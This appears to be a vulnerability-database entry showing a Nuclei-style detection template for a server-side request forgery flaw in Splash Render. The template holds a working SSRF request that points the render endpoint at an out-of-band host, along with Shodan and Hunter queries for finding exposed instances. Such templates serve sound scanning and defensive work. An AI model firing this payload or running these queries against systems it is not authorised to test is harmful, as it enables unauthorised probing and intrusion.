splash-render-ssrf: Splash Render - SSRF

2025-08-01 Splash Render PoC Public

Description

Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.

PoC

id: splash-render-ssrf

info:
  name: Splash Render - SSRF
  author: pwnhxl
  severity: high
  description: Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.
  reference:
    - https://github.com/scrapinghub/splash
    - https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
  classification:
    cwe-id: CWE-99,CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Splash"
    hunter-query: web.title="Splash" && header="TwistedWeb"
  tags: splash,ssrf,oast,oss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/render.html?url=https://oast.live"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009d327319733c324239214c2314c31dd629454feabe4338cdcfeafd868bee464d02200a57589ba1d64b17bdfc73260cfb085790e906fdf2c258bbb9a8538a751f9733:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities